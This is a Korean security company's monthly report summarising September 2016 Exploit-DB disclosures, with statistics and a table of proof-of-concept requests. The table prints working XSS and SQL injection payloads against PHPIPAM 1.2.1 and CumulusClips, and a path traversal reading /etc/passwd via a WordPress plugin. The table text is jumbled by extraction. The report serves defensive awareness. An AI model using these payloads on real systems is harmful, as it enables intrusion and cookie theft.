EDB 분석 보고서 (2016.09) 2016.09.01~2016.09.30 Exploit-DB( 공개된 취약점별로 분류한 정보입니다
Total Page:16
File Type:pdf, Size:1020Kb
EDB 분석 보고서 (2016.09) 2016.09.01~2016.09.30 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다. 분석 내용 정리 (작성: 펜타시큐리티시스템 보안성평가팀) 2016년 9월에 공개된 Exploit-DB의 분석 결과, Cross Site Scripting 공격에 대한 취약점 보고 개수가 가장 많았습니다. 발견된 Cross Site Scripting 공격들의 대부분은 오픈소스 아이피 관리 시스템인 PHPIPAM에서 발견되었습니다. PHPIPAM 에서 발견된 공격들을 분석해보면, 파라미터 값을 변조하여 스크립트를 삽입하는 단순한 공격들의 형태가 대부분이었습니다. SQL Injection 공격 역시 PHPIAM에 서 발견되었는데, 이 역시 공격의 위험도와 난이도가 높은 형태들의 공격은 아니었습니다. 그러나, 취약점이 발견된 페이지가 상당히 많고 추가적인 공격에 노출될 수 있으므로 PHPIPAM을 사용하는 관리자는 시큐어코딩 및 보안업데이트가 필요해 보입니다. 또한, 이번 달에는 Exponent CMS에서 특이한 SQL Injection 취약점이 발견되었습니다. 대부분의 SQL Injection 공격은 Parameter의 value를 노리게 되는 데, 이번에 발견된 취약점은 일반적인 Parameter key, value의 구조가 아닌 URL경로에 공격하는 패턴이었습니다. 이는 일반적으로는 성공이 되지 않는 취약점이지만 사이트의 구조에 따라 얼마든지 공격이 성공할 수 있는 취약점입니다. Exponent CMS와 마찬가지로 사이트가 URL 경로를 이용해서 어떠한 행위를 한다면 반드시 주의해야 될 부분이므로 관련 공격코드를 참고하여 취약점에 노출되지 않도록 주의 해야 합니다. 30 1. 취약점 별 보고 개수 취약점 별 보고 개수 26 취약점 보고 개수 25 LFI 1 RFI 1 20 Directory Traversal 1 SQL Injection 7 15 XSS 26 총합계 36 10 7 5 1 1 1 0 LFI RFI Directory Traversal SQL Injection XSS 2. 위험도별 분류 위험도 별 분류 위험도 보고 개수 백분율 상 2 5.56% 2 중 34 94.44% 합계 36 100.00% 상 중 34 3. 공격 난이도 별 현황 공격 난이도 보고 개수 백분율 공격 난이도 별 현황 상 2 5.56% 중 1 2.78% 하 33 91.67% 2 1 총합계 36 100.00% 상 중 하 33 4. 주요 소프트웨어 별 취약점 발생 현황 소프트웨어 이름 보고개수 주요 소프트웨어 별 취약점 발생 현황 PHPIPAM 23 Kajona 3 Jobberbase 2 1 1 1 PHPIPAM Joomla 2 1 Wordpress 1 1 Kajona 1 Matrimonial Website Script 1 Jobberbase Exponent CMS 1 2 Joomla Zabbix 1 Wordpress 2 AnoBBS 1 Matrimonial Website Script CumulusClips 1 Exponent CMS 3 총합계 36 23 Zabbix AnoBBS CumulusClips EDB 분석 보고서 (2016.09) 2016.09.01~2016.09.30 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다. 날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경 WordPress RB Agency Plugin /wp-content/plugins/rb- WordPress RB 2016-09-05 40333 LFI 하 중 2.4.7 - forcedownload.php LFI agency/ext/forcedownload.php?file=../../../../../../../../etc/pass Wordpress Agency Plugin 취약점 wd 2.4.7 POST /phpipam/app/tools/user-menu/user-edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 - user-edit.php Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 SQL Injection 하 중 PHPIPAM SQL Injection 취약점 1.2.1 real_name=phpIPAM+Admin&email=admin%40domain.loc al&password1=&password2=&mailNotify=No&mailChang elog=No&printLimit=30&lang=9'%20or%201=1-- POST /phpipam/app/admin/subnets/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 - Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/subnets/e PHPIPAM 1.2.1 dit.php XSS 취약점 sectionId=2&subnetId=1&action=edit"><SCRIPT>ALERT(D OCUMENT.COOKIE);</SCRIPT> POST /phpipam/app/admin/widgets/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 - Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/widgets/e PHPIPAM 1.2.1 dit.php XSS 취약점 wid=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT> &action=edit POST /phpipam/app/admin/scan-agents/edit.php HTTP/1.1 PHPIPAM 1.2.1 - Host: PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/scan- Content-Type: application/x-www-form-urlencoded PHPIPAM 1.2.1 agents/edit.php XSS 취약점 id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE); </SCRIPT> POST /phpipam/app/admin/groups/edit-group.php HTTP/1.1 PHPIPAM 1.2.1 - Host: PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/groups/ed Content-Type: application/x-www-form-urlencoded PHPIPAM 1.2.1 it-group.php XSS 취약점 id=2"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&a ction=edit POST /phpipam/app/admin/users/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 - Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/users/edit. PHPIPAM 1.2.1 php XSS 취약점 id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE); </SCRIPT> POST /phpipam/app/admin/tags/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 - Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/tags/edit. PHPIPAM 1.2.1 php XSS 취약점 id=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE); </SCRIPT> POST /phpipam/app/admin/instructions/preview.php HTTP/1.1 PHPIPAM 1.2.1 - Host: PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/instruction Content-Type: application/x-www-form-urlencoded PHPIPAM 1.2.1 s/preview.php XSS 취약점 instructions=You+can+write+instructions+under+admin+ menu!"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT> POST /phpipam/app/admin/languages/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 - Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/sections/e PHPIPAM 1.2.1 dit.php XSS 취약점 sectionId=2"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCR IPT>&action=edit POST /phpipam/app/admin/subnets/edit-folder.php HTTP/1.1 Host: PHPIPAM 1.2.1 - Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/subnets/e PHPIPAM 1.2.1 dit-folder.php XSS 취약점 sectionId=1&subnetId=5&action=edit"><SCRIPT>ALERT(D OCUMENT.COOKIE);</SCRIPT>&location=IPaddresses POST /phpipam/app/admin/devices/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 - Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/devices/e PHPIPAM 1.2.1 dit.php XSS 취약점 switchId=1&action=edit"><SCRIPT>ALERT(DOCUMENT.CO OKIE);</SCRIPT> POST /phpipam/app/admin/device-types/edit.php HTTP/1.1 PHPIPAM 1.2.1 - Host: PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/device- Content-Type: application/x-www-form-urlencoded PHPIPAM 1.2.1 types/edit.php XSS 취약점 tid=1&action=edit"><SCRIPT>ALERT(DOCUMENT.COOKIE); </SCRIPT> EDB 분석 보고서 (2016.09) 2016.09.01~2016.09.30 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다. 날짜 EDB번호 취약점 분류 공격 난이도 공격 위험도 취약점 이름 핵심 공격 코드 대상프로그램 대상환경 POST /phpipam/app/admin/vlans/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 - Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/vlans/edit. PHPIPAM 1.2.1 php XSS 취약점 vlanId=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT >&action=edit&vlanNum= POST /phpipam/app/admin/vlans/edit-domain.php HTTP/1.1 PHPIPAM 1.2.1 - Host: PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/vlans/edit- Content-Type: application/x-www-form-urlencoded PHPIPAM 1.2.1 domain.php XSS 취약점 id="><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT>&ac tion=add POST /phpipam/app/admin/nameservers/edit.php HTTP/1.1 PHPIPAM 1.2.1 - Host: PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/nameserv Content-Type: application/x-www-form-urlencoded PHPIPAM 1.2.1 ers/edit.php XSS 취약점 nameserverId=1"><SCRIPT>ALERT(DOCUMENT.COOKIE);< /SCRIPT>&action=edit POST /phpipam/app/admin/custom-fields/filter.php HTTP/1.1 PHPIPAM 1.2.1 - Host: PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/custom- Content-Type: application/x-www-form-urlencoded PHPIPAM 1.2.1 fields/filter.php XSS 취약점 table=ipaddresses"><SCRIPT>ALERT(DOCUMENT.COOKIE); </SCRIPT> POST /phpipam/app/admin/replace-fields/result.php HTTP/1.1 Host: PHPIPAM 1.2.1 - Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/replace- PHPIPAM 1.2.1 fields/result.php XSS 취약점 field=description"><SCRIPT>ALERT(DOCUMENT.COOKIE);< /SCRIPT>&search=a&csrf_cookie=892d2a900ec7fc1ba9486 ec171a36f71&replace=a POST /phpipam/app/admin/subnets/edit.php HTTP/1.1 Host: PHPIPAM 1.2.1 - Content-Type: application/x-www-form-urlencoded PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/subnets/e PHPIPAM 1.2.1 dit.php XSS 취약점 sectionId=1&subnetId=6&action=edit&location=IPaddress es"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIPT> POST /phpipam/app/admin/subnets/edit-folder.php HTTP/1.1 PHPIPAM 1.2.1 - Host: PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/admin/subnets/e Content-Type: application/x-www-form-urlencoded PHPIPAM 1.2.1 dit-folder.php XSS 취약점 sectionId=2&subnetId="><SCRIPT>ALERT(DOCUMENT.CO OKIE);</SCRIPT>&action=add&location=IPaddresses POST /phpipam/app/tools/devices/devices-print.php HTTP/1.1 PHPIPAM 1.2.1 - Host: PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/tools/devices/dev Content-Type: application/x-www-form-urlencoded PHPIPAM 1.2.1 ices-print.php XSS 취약점 ffield=hostname"><SCRIPT>ALERT(DOCUMENT.COOKIE);< /SCRIPT>&fval=a&direction=hostname%7Casc POST /phpipam/app/tools/subnet-masks/popup.php HTTP/1.1 PHPIPAM 1.2.1 - Host: PHPIPAM 2016-09-06 40338 XSS 하 중 /phpipam/app/tools/subnet- Content-Type: application/x-www-form-urlencoded PHPIPAM 1.2.1 masks/popup.php XSS 취약점 closeClass=hidePopups"><SCRIPT>ALERT(DOCUMENT.CO OKIE);</SCRIPT> /phpipam/?page=tools§ion=changelog&subnetId=a& PHPIPAM 1.2.1 - /phpipam/ XSS PHPIPAM 2016-09-06 40338 XSS 하 중 sPage=50"><SCRIPT>ALERT(DOCUMENT.COOKIE);</SCRIP PHPIPAM 취약점 1.2.1 T> PHPIPAM 1.2.1 - /phpipam/ SQL /phpipam/?page=tools§ion=changelog&subnetId=a& PHPIPAM 2016-09-06 40338 SQL Injection 하 중 PHPIPAM Injection 취약점 sPage=50'%20or%201=1-- 1.2.1 POST / HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* CumulusClips 2.4.1 - Content-Type: application/x-www-form-urlencoded; CumulusClips 2016-09-07 40343 XSS 하 중 /cumulusclips/account/videos/e CumulusClips charset=UTF-8 2.4.1 dit/1358/ XSS 취약점 title=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&t ags=www%3Cscript%3Ealert%281%29%3C%2Fscript%3E&c at_id=1&description=www%3Cscript%3Ealert%281%29%3C %2Fscript%3E&private_url=DyZbn8m&submitted=TRUE&b utton=Update+Video EDB 분석 보고서 (2016.09) 2016.09.01~2016.09.30 Exploit-DB(http://exploit-db.com)에 공개된 취약점별로 분류한 정보입니다.